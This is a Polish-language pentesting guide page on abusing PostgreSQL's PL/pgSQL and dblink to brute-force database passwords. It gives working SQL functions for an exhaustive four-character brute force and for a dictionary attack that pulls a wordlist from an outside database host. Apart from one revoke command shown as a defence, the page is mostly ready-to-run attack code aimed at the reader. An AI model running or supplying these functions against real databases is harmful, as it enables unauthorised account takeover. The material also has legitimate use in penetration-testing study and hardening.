PL/pgSQL Password Bruteforce

Reading time: 3 minutes

Znajdź więcej informacji na temat tych ataków w oryginalnym dokumencie.

PL/pgSQL to w pełni funkcjonalny język programowania, który wykracza poza możliwości SQL, oferując ulepszoną kontrolę proceduralną. Obejmuje to wykorzystanie pętli i różnych struktur kontrolnych. Funkcje stworzone w języku PL/pgSQL mogą być wywoływane przez instrukcje SQL i wyzwalacze, co poszerza zakres operacji w środowisku bazy danych.

Możesz nadużyć tego języka, aby poprosić PostgreSQL o brutalne łamanie poświadczeń użytkowników, ale musi on istnieć w bazie danych. Możesz zweryfikować jego istnienie, używając:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Domyślnie tworzenie funkcji jest przywilejem przyznawanym PUBLIC, gdzie PUBLIC odnosi się do każdego użytkownika w tym systemie baz danych. Aby temu zapobiec, administrator mógłby cofnąć przywilej USAGE z domeny PUBLIC:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

W takim przypadku nasze wcześniejsze zapytanie zwróciłoby różne wyniki:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Zauważ, że aby poniższy skrypt działał, funkcja dblink musi istnieć. Jeśli nie istnieje, możesz spróbować ją stworzyć za pomocą

CREATE EXTENSION dblink;

Password Brute Force

Oto jak możesz przeprowadzić atak brute force na hasło składające się z 4 znaków:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Note, że nawet łamanie 4 znaków może zająć kilka minut.

Możesz również pobrać listę słów i spróbować tylko tych haseł (atak słownikowy):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');